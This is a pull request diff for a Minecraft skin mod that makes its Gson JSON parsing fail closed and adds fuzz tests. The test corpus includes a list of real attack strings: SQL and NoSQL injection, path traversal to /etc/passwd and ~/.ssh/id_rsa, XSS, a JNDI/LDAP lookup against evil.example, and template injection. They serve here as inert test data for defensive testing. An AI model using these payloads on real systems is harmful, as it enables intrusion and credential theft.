### PR TITLE
fix(1.12.2): fail closed on Gson NFE/ISE parse escapes (round 9)

### DIFF
--- a/src/main/java/levosilimo/everlastingskins/skinchanger/MineSkinApiHttpImpl.java
+++ b/src/main/java/levosilimo/everlastingskins/skinchanger/MineSkinApiHttpImpl.java
@@ -171,7 +171,7 @@ public class MineSkinApiHttpImpl implements MineSkinAPI {
     }
 
     private static Optional<MineSkinResponse> toSkinResponse(HttpResponse response, @Nullable SkinVariant requestedVariant) {
-        MineSkinResponse v1 = toV1Response(response.getBodyAs(MineSkinUrlResponse.class), requestedVariant);
+        MineSkinResponse v1 = toV1Response(parseBodyOrNull(response, MineSkinUrlResponse.class), requestedVariant);
         if (v1 != null) {
             return Optional.of(v1);
         }
@@ -243,7 +243,10 @@ public class MineSkinApiHttpImpl implements MineSkinAPI {
         try {
             JsonObject json = JsonUtils.parseJson(body);
             return jsonObject(json, "skin");
-        } catch (JsonParseException e) {
+        } catch (JsonParseException | NumberFormatException | IllegalStateException e) {
+            // Gson raises these on truncated escapes and non-object roots; fail closed.
+            return null;
+        } catch (RuntimeException e) {
             return null;
         }
     }
@@ -260,7 +263,7 @@ public class MineSkinApiHttpImpl implements MineSkinAPI {
 
     private static void sleepForRateLimit(HttpResponse response) {
         int waitMs = 0;
-        MineSkinErrorDelayResponse delay = response.getBodyAs(MineSkinErrorDelayResponse.class);
+        MineSkinErrorDelayResponse delay = parseBodyOrNull(response, MineSkinErrorDelayResponse.class);
         if (delay != null) {
             if (delay.nextRequest() != null && delay.nextRequest() > 0) {
                 waitMs = delay.nextRequest();
@@ -305,7 +308,9 @@ public class MineSkinApiHttpImpl implements MineSkinAPI {
                 return (int) Math.max(0, Math.min(wait, Integer.MAX_VALUE));
             }
             return 0;
-        } catch (JsonParseException e) {
+        } catch (JsonParseException | NumberFormatException | IllegalStateException e) {
+            return 0;
+        } catch (RuntimeException e) {
             return 0;
         }
     }
@@ -323,5 +328,28 @@ public class MineSkinApiHttpImpl implements MineSkinAPI {
         } catch (InterruptedException e) {
             Thread.currentThread().interrupt();
         }
+    }
+
+    /**
+     * Gson's strict {@code fromJson} (inside {@link HttpResponse#getBodyAs})
+     * throws raw NumberFormatException on truncated {@code \\uXXXX} escapes
+     * and IllegalStateException on valid non-object roots, neither a
+     * JsonSyntaxException. Every parse failure must fail closed: null, never
+     * an exception escape out of the HTTP parse paths.
+     */
+    private static <T> T parseBodyOrNull(HttpResponse response, Class<T> clazz) {
+        try {
+            return response.getBodyAs(clazz);
+        } catch (JsonParseException | NumberFormatException | IllegalStateException e) {
+            logParseFailure(e);
+            return null;
+        } catch (RuntimeException e) {
+            logParseFailure(e);
+            return null;
+        }
+    }
+
+    private static void logParseFailure(RuntimeException e) {
+        EverlastingSkins.logger.warn("Failed to parse MineSkin API response: " + e);
     }
 }

--- a/src/main/java/levosilimo/everlastingskins/skinchanger/MojangApiHttpImpl.java
+++ b/src/main/java/levosilimo/everlastingskins/skinchanger/MojangApiHttpImpl.java
@@ -3,7 +3,9 @@
  */
 package levosilimo.everlastingskins.skinchanger;
 
+import com.google.gson.JsonParseException;
 import levosilimo.everlastingskins.Config;
+import levosilimo.everlastingskins.EverlastingSkins;
 import levosilimo.everlastingskins.skinchanger.responses.HttpResponse;
 import levosilimo.everlastingskins.skinchanger.responses.mojang.MojangProfileResponse;
 import levosilimo.everlastingskins.skinchanger.responses.mojang.MojangSkinDataResult;
@@ -127,10 +129,33 @@ public class MojangApiHttpImpl implements MojangAPI {
             if (response.statusCode() != 200) {
                 return Optional.empty();
             }
-            return Optional.ofNullable(response.getBodyAs(bodyType));
+            return Optional.ofNullable(parseBodyOrNull(response, bodyType));
         } catch (IOException e) {
             return Optional.empty();
         }
+    }
+
+    /**
+     * Gson's strict {@code fromJson} (inside {@link HttpResponse#getBodyAs})
+     * throws raw NumberFormatException on truncated {@code \\uXXXX} escapes
+     * and IllegalStateException on valid non-object roots, neither a
+     * JsonSyntaxException. Every parse failure must fail closed: null, never
+     * an exception escape out of the HTTP parse paths.
+     */
+    private static <T> T parseBodyOrNull(HttpResponse response, Class<T> clazz) {
+        try {
+            return response.getBodyAs(clazz);
+        } catch (JsonParseException | NumberFormatException | IllegalStateException e) {
+            logParseFailure(e);
+            return null;
+        } catch (RuntimeException e) {
+            logParseFailure(e);
+            return null;
+        }
+    }
+
+    private static void logParseFailure(RuntimeException e) {
+        EverlastingSkins.logger.warn("Failed to parse Mojang API response: " + e);
     }
 
     /**

--- a/src/main/java/levosilimo/everlastingskins/util/JsonUtils.java
+++ b/src/main/java/levosilimo/everlastingskins/util/JsonUtils.java
@@ -9,6 +9,7 @@ package levosilimo.everlastingskins.util;
 import com.google.gson.Gson;
 import com.google.gson.GsonBuilder;
 import com.google.gson.JsonObject;
+import com.google.gson.JsonParseException;
 import com.google.gson.JsonParser;
 
 public class JsonUtils {
@@ -24,7 +25,20 @@ public class JsonUtils {
         return GSON.toJson(obj);
     }
 
+    /**
+     * Parses a JSON document, failing closed: every parse failure surfaces
+     * as {@link JsonParseException}. Gson internals raise raw
+     * NumberFormatException on truncated {@code \\uXXXX} escapes and
+     * IllegalStateException on non-object roots; both are normalized so
+     * callers can rely on the documented exception class.
+     */
     public static JsonObject parseJson(String json) {
-        return JSON_PARSER.parse(json).getAsJsonObject();
+        try {
+            return JSON_PARSER.parse(json).getAsJsonObject();
+        } catch (JsonParseException e) {
+            throw e;
+        } catch (RuntimeException e) {
+            throw new JsonParseException("Malformed JSON", e);
+        }
     }
 }

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/JsonUtilsFuzzTest.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/JsonUtilsFuzzTest.java
@@ -1,0 +1,156 @@
+/*
+ * SPDX-License-Identifier: MIT
+ * Copyright (c) 2025 Levosilimo
+ * https://github.com/Levosilimo/Everlasting-Skins
+ */
+
+package levosilimo.everlastingskins.skinchanger;
+
+import com.google.gson.JsonArray;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonObject;
+import com.google.gson.JsonParseException;
+import com.google.gson.JsonParser;
+import levosilimo.everlastingskins.util.JsonUtils;
+import net.jqwik.api.ForAll;
+import net.jqwik.api.From;
+import net.jqwik.api.Label;
+import net.jqwik.api.Property;
+import net.jqwik.api.Provide;
+
+import java.util.HashSet;
+import java.util.Map;
+import java.util.Set;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertNotNull;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.junit.jupiter.api.Assertions.fail;
+
+/**
+ * Fuzz corpus for {@link JsonUtils}, the shared Gson wrapper used by every
+ * HTTP/JSON parser in the mod (AI-generated code surface, cf. Pearce et al.,
+ * S&P 2022). Properties cover the malformed-bytes contract, canonical
+ * serialization of arbitrary objects, and the inertness of hostile string
+ * payloads (SQL/NoSQL injection, path traversal, prototype-pollution
+ * shapes): parsed hostile content must stay plain data, never take on
+ * semantic meaning.
+ */
+class JsonUtilsFuzzTest {
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> malformedJson() {
+        return MalformedJsonCorpus.malformedJson();
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<String> hostileValues() {
+        return MalformedJsonCorpus.hostileValues();
+    }
+
+    @Provide
+    net.jqwik.api.Arbitrary<Object> arbitraryValues() {
+        return MalformedJsonCorpus.arbitraryValues();
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  D1: parseJson fail-closed contract                                 */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Malformed bytes must either be rejected with Gson's own parse failure
+     * ({@link JsonParseException} — the only exception class allowed to
+     * escape the raw parser) or parse to a non-null {@link JsonObject}.
+     * Anything else — a different exception class, an {@link Error}, or a
+     * half-parsed result — violates the fail-closed contract.
+     */
+    @Property(tries = 100)
+    @Label("D1: parseJson either rejects malformed bytes or returns a JsonObject, never other failures")
+    void parseJson_malformedBytes_returnsNullOrThrows(@ForAll @From("malformedJson") String bytes) {
+        try {
+            JsonObject result = JsonUtils.parseJson(bytes);
+            assertNotNull(result, () -> "parseJson returned null for: " + excerpt(bytes));
+        } catch (JsonParseException expected) {
+            // malformed bytes fail closed with Gson's documented parse failure
+        } catch (Throwable unexpected) {
+            fail("unexpected failure class " + unexpected.getClass().getName()
+                    + " on: " + excerpt(bytes), unexpected);
+        }
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  D2: toJson canonical serialization                                 */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * Arbitrary acyclic object graphs must serialize without throwing, the
+     * output must be valid JSON text (re-parseable), and serialization must
+     * be deterministic (same object, same bytes every time).
+     */
+    @Property(tries = 100)
+    @Label("D2: toJson canonicalizes arbitrary objects: no throw, valid JSON, deterministic")
+    void toJson_canonicalizesArbitraryObject_noThrow(@ForAll @From("arbitraryValues") Object value) {
+        String first = JsonUtils.toJson(value);
+        assertNotNull(first);
+        // canonical JSON text: the output re-parses as a JsonElement
+        JsonElement reparsed = new JsonParser().parse(first);
+        assertNotNull(reparsed);
+        assertEquals(first, JsonUtils.toJson(value),
+                "toJson must be deterministic for: " + excerpt(first));
+    }
+
+    /* ------------------------------------------------------------------ */
+    /*  D3: hostile payloads stay inert data                               */
+    /* ------------------------------------------------------------------ */
+
+    /**
+     * SQL/NoSQL injection, path-traversal and prototype-pollution payloads
+     * embedded in string values must parse as plain data: every string leaf
+     * of the parsed tree is byte-identical to one of the corpus literals
+     * (nothing decoded, unescaped further, evaluated, or otherwise given
+     * semantic meaning), and parsing is repeatable.
+     */
+    @Property(tries = 100)
+    @Label("D3: hostile string payloads parse to inert data, never to semantic effect")
+    void parseJson_sqlInjection_noSemanticEffect(@ForAll @From("hostileValues") String doc) {
+        JsonObject parsed = JsonUtils.parseJson(doc);
+        assertNotNull(parsed, () -> "hostile document did not parse: " + excerpt(doc));
+
+        Set<String> leaves = new HashSet<String>();
+        collectStringLeaves(parsed, leaves);
+        for (String leaf : leaves) {
+            assertTrue(MalformedJsonCorpus.HOSTILE_LITERALS.contains(leaf) || leaf.isEmpty(),
+                    () -> "hostile document yielded interpreted value '" + excerpt(leaf)
+                            + "' from: " + excerpt(doc));
+        }
+
+        assertEquals(parsed.toString(), JsonUtils.parseJson(doc).toString(),
+                "parsing a hostile document must be repeatable");
+    }
+
+    /* ================================================================== */
+    /*  Helpers                                                           */
+    /* ================================================================== */
+
+    private static void collectStringLeaves(JsonElement element, Set<String> leaves) {
+        if (element.isJsonObject()) {
+            for (Map.Entry<String, JsonElement> member : element.getAsJsonObject().entrySet()) {
+                collectStringLeaves(member.getValue(), leaves);
+            }
+        } else if (element.isJsonArray()) {
+            JsonArray array = element.getAsJsonArray();
+            for (int i = 0; i < array.size(); i++) {
+                collectStringLeaves(array.get(i), leaves);
+            }
+        } else if (element.isJsonPrimitive() && element.getAsJsonPrimitive().isString()) {
+            leaves.add(element.getAsString());
+        }
+    }
+
+    private static String excerpt(String s) {
+        if (s.length() <= 96) {
+            return s;
+        }
+        return s.substring(0, 96) + "…(" + s.length() + " chars)";
+    }
+}

--- a/src/test/java/levosilimo/everlastingskins/skinchanger/MalformedJsonCorpus.java
+++ b/src/test/java/levosilimo/everlastingskins/skinchanger/MalformedJsonCorpus.java
@@ -1,0 +1,579 @@
+/*
+ * SPDX-License-Identifier: MIT
+ * Copyright (c) 2025 Levosilimo
+ * https://github.com/Levosilimo/Everlasting-Skins
+ */
+
+package levosilimo.everlastingskins.skinchanger;
+
+import com.google.gson.Gson;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonParser;
+import com.google.gson.JsonParseException;
+import com.google.gson.JsonSyntaxException;
+import levosilimo.everlastingskins.enums.SkinVariant;
+import net.jqwik.api.Arbitraries;
+import net.jqwik.api.Arbitrary;
+import net.jqwik.api.Combinators;
+import net.jqwik.api.Tuple;
+
+import java.nio.charset.StandardCharsets;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.HashMap;
+import java.util.LinkedHashMap;
+import java.util.List;
+import java.util.Map;
+import java.util.UUID;
+
+/**
+ * Shared jqwik generators for the AI-generated parser fuzz corpus.
+ * <p>
+ * Motivation (Pearce et al., S&P 2022): ~40% of Copilot-generated programs
+ * in 89 security scenarios contain vulnerabilities (CWE-79 XSS, CWE-787 OOB
+ * write, CWE-330 insufficient randomness). The mod's HTTP/JSON parsers
+ * (MojangApiHttpImpl, MineSkinApiHttpImpl, JsonUtils, RandomMojangSkin) are
+ * exactly this surface, so every generator here produces "malformed JSON
+ * byte shapes" that those parsers must fail closed on: default behavior is
+ * "no result", never an exception escape.
+ * <p>
+ * Corpus contract (what the properties are allowed to feed the parsers):
+ * <ul>
+ *   <li>Every input is either malformed JSON (Gson raises JsonSyntaxException,
+ *       which {@code HttpResponse.getBodyAs} swallows) or valid JSON with an
+ *       <b>object</b> root whose hostile content stays inert data.</li>
+ *   <li>Valid non-object roots ({@code [1,2]}, {@code 1}, {@code "x"},
+ *       {@code null}, {@code NaN} as a whole document) are excluded: they make
+ *       {@code JsonObject#getAsJsonObject} throw {@code IllegalStateException},
+ *       a fail-open escape in the MineSkin v2/rate-limit paths that is a
+ *       documented production finding, not a malformed-bytes shape. The
+ *       {@link #malformedJson()} mix re-filters every candidate as a safety
+ *       net.</li>
+ *   <li>No input parses to a complete result: hostile values only land in
+ *       scalar fields, never as a valid 32-hex UUID or a complete textures
+ *       property, so the {@code returnsEmpty} properties assert a real
+ *       fail-closed contract instead of semantic base64 validation.</li>
+ *   <li>Deep nesting is object-rooted: Gson 2.10.1 parses nesting
+ *       iteratively (probed to 100k depth on a 1 MB stack), so "excess
+ *       nesting that overflows Gson stack limits" is exercised as hostile
+ *       input without depending on the test thread's stack size.</li>
+ * </ul>
+ * Test-support only: this file is never shipped.
+ */
+public final class MalformedJsonCorpus {
+
+    private MalformedJsonCorpus() {
+    }
+
+    private static final Gson GSON = new Gson();
+    private static final JsonParser PARSE_FILTER = new JsonParser();
+
+    /** The exact marker {@link RandomMojangSkin} scans for. */
+    private static final String SPAN_OPENER = "<span class=\"card-title green-text truncate\">";
+
+    /* ================================================================== */
+    /*  Hostile literal pools (SQLi, NoSQLi, traversal, XSS, templates)    */
+    /* ================================================================== */
+
+    /** Injection payloads; every string value in the hostile docs comes from here. */
+    public static final List<String> HOSTILE_LITERALS = Arrays.asList(
+            // SQL injection (CWE-89)
+            "' OR 1=1 --",
+            "'; DROP TABLE skins;--",
+            "\" OR \"\"=\"\"",
+            "' UNION SELECT username,password FROM users--",
+            "1' AND '1'='1",
+            "'; WAITFOR DELAY '0:0:5';--",
+            "' OR 'a'='a",
+            "x' OR 1=1 #",
+            "' OR 1=1 /*",
+            "%' OR '1'='1",
+            // NoSQL operator injection
+            "$where",
+            "this.password == ''",
+            "$ne",
+            "$gt",
+            "$regex",
+            "$or",
+            "sleep(5000)",
+            // path traversal (CWE-22)
+            "../../etc/passwd",
+            "..\\..\\windows\\system32\\cmd.exe",
+            "/etc/passwd",
+            "~/.ssh/id_rsa",
+            "..%2F..%2Fetc%2Fpasswd",
+            "....//....//etc/passwd",
+            "C:\\Windows\\System32\\drivers\\etc\\hosts",
+            "file:///etc/passwd",
+            "http://evil.example/../../s",
+            "\u0000",
+            "/proc/self/environ",
+            "..;/..;/etc/passwd",
+            "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
+            // XSS (CWE-79) and template injection
+            "<script>alert(1)</script>",
+            "javascript:alert(document.cookie)",
+            "${jndi:ldap://evil.example/a}",
+            "{{7*7}}",
+            "{{constructor.constructor('return process')().env.HOME}}"
+    );
+
+    /** Path-traversal subset reused by the HTML corpus. */
+    public static final List<String> TRAVERSAL_LITERALS = Arrays.asList(
+            "../../etc/passwd",
+            "..\\..\\windows\\system32\\cmd.exe",
+            "/etc/passwd",
+            "~/.ssh/id_rsa",
+            "..%2F..%2Fetc%2Fpasswd",
+            "....//....//etc/passwd",
+            "C:\\Windows\\System32\\drivers\\etc\\hosts",
+            "file:///etc/passwd",
+            "http://evil.example/../../s",
+            "\u0000",
+            "/proc/self/environ",
+            "..;/..;/etc/passwd",
+            "%2e%2e%2f%2e%2e%2fetc%2fpasswd"
+    );
+
+    /** Prototype-pollution-shaped documents; all string values come from {@link #HOSTILE_LITERALS}. */
+    private static final String[] PP_DOCS = {
+            "{\"__proto__\":{\"polluted\":\"' OR 1=1 --\"}}",
+            "{\"__proto__\":{\"__proto__\":{\"x\":\"../../etc/passwd\"}}}",
+            "{\"constructor\":{\"prototype\":{\"x\":\"' OR 1=1 --\"}}}",
+            "{\"prototype\":{\"__proto__\":\"~/.ssh/id_rsa\"}}",
+            "{\"hasOwnProperty\":\"javascript:alert(document.cookie)\"}",
+            "{\"__defineGetter__\":\"../../etc/passwd\"}",
+            "{\"a\":{\"__proto__\":{\"b\":\"' OR 1=1 --\"}}}",
+            "{\"__proto__\":\"../../etc/passwd\",\"constructor\":{\"prototype\":{\"x\":1}}}"
+    };
+
+    /** Rate-limit-shaped bodies that must resolve to a zero wait (no sleep, no delay metric). */
+    private static final String[] RATE_LIMIT_DOCS = {
+            "{\"error\":\"' OR 1=1 --\",\"delay\":-1}",
+            "{\"error\":\"../../etc/passwd\",\"delay\":0}",
+            "{\"nextRequest\":-1,\"delay\":-100}",
+            "{\"delay\":\"-5\"}",
+            "{\"rateLimit\":{\"next\":{\"relative\":-100}}}",
+            "{\"rateLimit\":{\"next\":{\"relative\":0}}}",
+            "{\"rateLimit\":{\"next\":{\"relative\":-1,\"absolute\":1}}}",
+            "{\"rateLimit\":{\"next\":{\"absolute\":1}}}",
+            "{\"rateLimit\":{\"next\":{\"relative\":\"-5\"}}}",
+            "{\"rateLimit\":{\"next\":{\"relative\":-0.5}}}",
+            "{\"rateLimit\":{\"next\":{\"relative\":-1,\"__proto__\":{\"payload\":\"' OR 1=1 --\"}}}}",
+            "{\"rateLimit\":{\"__proto__\":{\"next\":{\"relative\":-1}}}}",
+            "{\"error\":{\"$where\":\"this.x==1\"},\"delay\":-1}",
+            "{\"error\":\"x' OR '1'='1\",\"nextRequest\":-999999}",
+            "{\"rateLimit\":{\"next\":{}}}",
+            "{\"rateLimit\":{}}"
+    };
+
+    /* ================================================================== */
+    /*  Universal malformed-JSON mix                                      */
+    /* ================================================================== */
+
+    /**
+     * The corpus every "malformed bytes" property draws from: empty and
+     * whitespace-only inputs, truncated documents, mismatched brackets,
+     * excess object nesting, invalid escapes, invalid numbers, invalid
+     * unicode, oversized documents, and hostile (SQLi/NoSQL/traversal/
+     * prototype-pollution) payloads. Every candidate is re-filtered so a
+     * valid non-object root can never reach a parser.
+     */
+    public static Arbitrary<String> malformedJson() {
+        return Arbitraries.frequencyOf(
+                Tuple.of(4, emptyOrWhitespace()),
+                Tuple.of(15, truncated()),
+                Tuple.of(15, mismatched()),
+                Tuple.of(12, deepNesting()),
+                Tuple.of(10, invalidEscapes()),
+                Tuple.of(10, invalidNumbers()),
+                Tuple.of(10, invalidUnicode()),
+                Tuple.of(4, oversized()),
+                Tuple.of(20, hostileValues())
+        ).filter(MalformedJsonCorpus::parsesToObjectOrMalformed);
+    }
+
+    /** MineSkin v2-shape failures: truncated v2 documents plus the universal mix. */
+    public static Arbitrary<String> v2Malformed() {
+        return Arbitraries.frequencyOf(
+                Tuple.of(15, malformedJson()),
+                Tuple.of(10, v2Truncated()),
+                Tuple.of(10, v2Corrupted())
+        ).filter(MalformedJsonCorpus::parsesToObjectOrMalformed);
+    }
+
+    /** MineSkin rate-limit bodies that must fail closed to a zero wait. */
+    public static Arbitrary<String> rateLimitMalformed() {
+        return Arbitraries.frequencyOf(
+                Tuple.of(70, malformedJson()),
+                Tuple.of(30, Arbitraries.of(RATE_LIMIT_DOCS))
+        ).filter(MalformedJsonCorpus::parsesToObjectOrMalformed);
+    }
+
+    /** Valid JSON with hostile string values; used by the injection-inertness property. */
+    public static Arbitrary<String> hostileValues() {
+        return Arbitraries.oneOf(
+                Arbitraries.of(HOSTILE_LITERALS.toArray(new String[0]))
+                        .map(MalformedJsonCorpus::hostileTemplate),
+                Arbitraries.of(PP_DOCS)
+        );
+    }
+
+    /* ================================================================== */
+    /*  JSON categories                                                   */
+    /* ================================================================== */
+
+    public static Arbitrary<String> emptyOrWhitespace() {
+        return Arbitraries.of("", " ", "\t", "\n", " \t\n  ", "\u00A0", "\r\n");
+    }
+
+    public static Arbitrary<String> truncated() {
+        String[] validDocs = {
+                "{\"name\":\"TestPlayer\",\"id\":\"12345678123412341234123456789abc\"}",
+                "{\"properties\":[{\"name\":\"textures\",\"value\":\"v\",\"signature\":\"s\"}]}",
+                "{\"data\":{\"texture\":{\"value\":\"v\",\"signature\":\"s\"}},\"id\":1,\"idStr\":\"1\",\"variant\":\"slim\"}",
+                "{\"skin\":{\"texture\":{\"data\":{\"value\":\"v\",\"signature\":\"s\"}},\"uuid\":\"u\",\"variant\":\"slim\"}}",
+                "{\"error\":\"e\",\"delay\":5}",
+                "{\"rateLimit\":{\"next\":{\"relative\":1000}}}",
+                "{\"raw\":{\"id\":\"x\",\"name\":\"y\",\"status\":\"OK\",\"properties\":[{\"name\":\"textures\",\"value\":\"v\",\"signature\":\"s\"}]}}"
+        };
+        return Arbitraries.oneOf(
+                Arbitraries.of(validDocs).flatMap(doc ->
+                        Arbitraries.integers().between(0, doc.length() - 1).map(i -> doc.substring(0, i))),
+                Arbitraries.of("{", "[", "\"foo", "{ \"k\":", "{\"a\":", "[1,2,",
+                        "{\"a\":[", "{\"a\":{\"b\":", "{\"a\":1,", "[\"a\",")
+        );
+    }
+
+    public static Arbitrary<String> mismatched() {
+        return Arbitraries.oneOf(
+                Arbitraries.of("{ ]", "[ }", "{ \"k\": ]", "[1, 2}", "{\"a\": ]", "]", "}",
+                        "{ [ } ]", "{\"a\":\"b\" ]", "[{\"a\":1}] }", "[1 2]", "{\"a\" \"b\"}",
+                        "{\"a\":[}", "{\"a\":{\"b\":}}"),
+                Arbitraries.strings()
+                        .withChars('[', ']', '{', '}', '"', ':', ',', '1', '2', ' ', 'a', 'n', 'u', 'l', 't', 'r', 'e', '0')
+                        .ofMinLength(1).ofMaxLength(48)
+                        .filter(MalformedJsonCorpus::parsesToObjectOrMalformed)
+        );
+    }
+
+    /**
+     * Excess nesting: object-rooted documents 50 to 3000 levels deep (arrays
+     * and objects). Gson 2.10.1 walks nesting iteratively, so these parse
+     * successfully and must resolve to "no result" rather than a crash.
+     */
+    public static Arbitrary<String> deepNesting() {
+        return Arbitraries.integers().between(50, 3000).map(MalformedJsonCorpus::deepNestedDoc);
+    }
+
+    public static Arbitrary<String> invalidEscapes() {
+        return Arbitraries.of(
+                "{\"k\":\"\\u\"}", "{\"k\":\"\\<\"}", "{\"k\":\"\\x\"}", "{\"k\":\"abc\\",
+                "{\"k\":\"\\u12\"}", "{\"k\":\"\\uZZZZ\"}", "{\"k\":\"abc", "{\"k\":\"\\uD800\"}",
+                "{\"k\":\"\\uDC00\"}", "{\"k\":\"\\ud800\\ud800\"}", "{\"k\":\"\\q\"}",
+                "{\"k\":\"\\u12\\u\"}", "{\"k\":\"a\\\\\"}", "{\"k\":\"\\b\\f\\r\\t\"}"
+        );
+    }
+
+    public static Arbitrary<String> invalidNumbers() {
+        return Arbitraries.of(
+                "{\"n\":NaN}", "{\"n\":Infinity}", "{\"n\":-Infinity}", "{\"n\":+1}", "{\"n\":01}",
+                "{\"n\":0x1}", "{\"n\":1.}", "{\"n\":.5}", "{\"n\":1e}", "{\"n\":--1}", "{\"n\":1e999}",
+                "{\"n\":9223372036854775808}", "{\"n\":-0}", "{\"n\":1_000}", "{\"n\":1e+}", "{\"n\":.}",
+                "{\"n\":1..2}", "{\"n\":0.0.0}", "{\"n\":12e}", "{\"id\":123456789012345678901234567890}"
+        );
+    }
+
+    public static Arbitrary<String> invalidUnicode() {
+        return Arbitraries.oneOf(
+                Arbitraries.of(
+                        "{\"k\":\"\\uD800\"}", "{\"k\":\"\\uDC00\"}", "{\"k\":\"\\udfff\"}",
+                        "{\"k\":\"\\uD800\\uDC00\"}", "{\"k\":\"\\u0000\"}", "{\"k\":\"\\u0001\"}",
+                        "{\"k\":\"\\uD800x\"}"),
+                Arbitraries.of(rawLoneSurrogate(), rawControlChar(), rawMalformedUtf8(),
+                        overlongUtf8(), rawNullByte(), rawLatin1Bytes())
+        );
+    }
+
+    /** Oversized documents: &gt;1 MB strings, huge keys, huge arrays, huge whitespace, 10k-key objects. */
+    public static Arbitrary<String> oversized() {
+        return Arbitraries.integers().between(0, 6).map(MalformedJsonCorpus::oversizedDoc);
+    }
+
+    /* ================================================================== */
+    /*  HTML categories (RandomMojangSkin.extractUsernames)               */
+    /* ================================================================== */
+
+    /**
+     * Malformed HTML that must extract nothing: random garbage, truncated
+     * copies of the span opener, and at most one complete opener never
+     * followed by a {@code <} (the parser bails out on both shapes).
+     */
+    public static Arbitrary<String> malformedHtml() {
+        Arbitrary<String> garbage = Arbitraries.strings()
+                .withChars('<', '>', '"', '\'', 's', 'p', 'a', 'n', 'c', 'l', 'r', 'd', 't', 'e',
+                        'g', 'i', 'u', ' ', '=', '/', '\\', '\n', '\t', '0', '1', '2', '.', '-', '_')
+                .ofMinLength(0).ofMaxLength(128);
+        Arbitrary<String> openerFree = garbage.filter(s -> s.indexOf(SPAN_OPENER) == -1);
+        Arbitrary<String> truncatedOpener = Arbitraries.integers().between(1, SPAN_OPENER.length() - 1)
+                .map(i -> SPAN_OPENER.substring(0, i));
+        Arbitrary<String> noLtSuffix = Arbitraries.strings()
+                .withChars('a', 'b', ' ', '9', '.', '/', '\\', '\n')
+                .ofMinLength(0).ofMaxLength(64);
+        Arbitrary<String> singleOpenerNoClose = Combinators.combine(openerFree, noLtSuffix)
+                .as((pre, suf) -> pre + SPAN_OPENER + suf);
+        return Arbitraries.oneOf(openerFree, truncatedOpener, singleOpenerNoClose);
+    }
+
+    /** Oversized HTML: many spans, a 1-64 KB username, up to 1 MB of noise, 100+ dangling openers. */
+    public static Arbitrary<String> oversizedHtml() {
+        Arbitrary<String> manySpans = Arbitraries.integers().between(100, 5000).map(n -> {
+            StringBuilder sb = new StringBuilder(n * 64);
+            for (int i = 0; i < n; i++) {
+                sb.append(SPAN_OPENER).append("User").append(i).append("</span>\n");
+            }
+            return sb.toString();
+        });
+        Arbitrary<String> longUsername = Arbitraries.integers().between(1024, 65536)
+                .map(n -> SPAN_OPENER + repeat('a', n) + "<");
+        Arbitrary<String> bigNoise = Arbitraries.integers().between(65536, 1048576)
+                .map(MalformedJsonCorpus::noiseHtml);
+        Arbitrary<String> manyOpeners = Arbitraries.integers().between(100, 10000)
+                .map(n -> repeat(SPAN_OPENER, n));
+        return Arbitraries.oneOf(manySpans, longUsername, bigNoise, manyOpeners);
+    }
+
+    /** Complete spans whose content is a path-traversal payload; nothing may be decoded. */
+    public static Arbitrary<String> traversalHtml() {
+        return Arbitraries.of(TRAVERSAL_LITERALS.toArray(new String[0]))
+                .map(lit -> "\n" + SPAN_OPENER + lit + "</span>\n" + SPAN_OPENER + lit + lit + "</span>");
+    }
+
+    /* ================================================================== */
+    /*  Arbitrary object graphs for toJson                                */
+    /* ================================================================== */
+
+    /** Acyclic arbitrary values (scalars, lists, maps, POJOs, enums, UUIDs, byte arrays). */
+    public static Arbitrary<Object> arbitraryValues() {
+        Arbitrary<Object> leaf = Arbitraries.oneOf(
+                Arbitraries.just(null),
+                Arbitraries.of(true, false),
+                Arbitraries.integers().between(-100000, 100000),
+                Arbitraries.longs().between(-1000000000000L, 1000000000000L),
+                Arbitraries.doubles().between(-1e6, 1e6),
+                Arbitraries.strings().withCharRange('a', 'z').ofMinLength(0).ofMaxLength(64),
+                Arbitraries.longs().map(l -> new UUID(l, l ^ 0x123456789ABCDEFL)),
+                Arbitraries.of(SkinVariant.CLASSIC, SkinVariant.SLIM),
+                Arbitraries.strings().ofMaxLength(32).map(s -> s.getBytes(StandardCharsets.UTF_8)),
+                Arbitraries.of(new FuzzPojo("alpha", 1), new FuzzPojo("beta", null), new FuzzPojo("", -7))
+        );
+        return Arbitraries.recursive(() -> leaf, MalformedJsonCorpus::nestedValue, 3);
+    }
+
+    /** Simple serializable POJO for the toJson property. */
+    public static final class FuzzPojo {
+        public final String name;
+        public final Integer count;
+
+        public FuzzPojo(String name, Integer count) {
+            this.name = name;
+            this.count = count;
+        }
+    }
+
+    /* ================================================================== */
+    /*  Helpers                                                           */
+    /* ================================================================== */
+
+    private static Arbitrary<Object> nestedValue(Arbitrary<Object> nested) {
+        return Arbitraries.oneOf(
+                nested.list().ofMinSize(0).ofMaxSize(4),
+                Arbitraries.maps(
+                        Arbitraries.strings().withCharRange('a', 'z').ofMinLength(0).ofMaxLength(8),
+                        nested
+                ).ofMaxSize(4)
+        );
+    }
+
+    /** Valid JSON whose hostile strings land only in inert scalar fields. */
+    private static String hostileTemplate(String literal) {
+        Map<String, Object> doc = new LinkedHashMap<String, Object>();
+        doc.put("name", literal);
+        doc.put("id", literal);
+        doc.put("properties", new ArrayList<Object>());
+        doc.put("$where", literal);
+        Map<String, Object> proto = new LinkedHashMap<String, Object>();
+        proto.put("payload", literal);
+        doc.put("__proto__", proto);
+        Map<String, Object> ctor = new LinkedHashMap<String, Object>();
+        Map<String, Object> ctorProto = new LinkedHashMap<String, Object>();
+        ctorProto.put("x", literal);
+        ctor.put("prototype", ctorProto);
+        doc.put("constructor", ctor);
+        return GSON.toJson(doc);
+    }
+
+    private static String deepNestedDoc(int depth) {
+        boolean objects = depth % 2 == 0;
+        StringBuilder sb = new StringBuilder(depth * 4 + 16);
+        if (objects) {
+            for (int i = 0; i < depth; i++) {
+                sb.append("{\"a\":");
+            }
+            sb.append("\"v\"");
+            for (int i = 0; i < depth; i++) {
